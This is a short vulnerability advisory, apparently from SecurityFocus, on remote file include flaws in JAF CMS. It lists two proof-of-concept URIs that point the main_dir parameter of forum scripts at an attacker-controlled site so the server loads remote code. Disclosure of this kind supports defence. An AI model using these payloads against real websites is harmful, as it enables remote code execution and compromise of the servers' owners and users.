JAF CMS Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[jmf_path]/module/forum/main.php?id=1&main_dir=http://attacker's site

http://www.example.com/[jmf_path]/module/forum/headlines.php?id=1&main_dir=http:attacker's site


 

Privacy Statement
Copyright 2010, SecurityFocus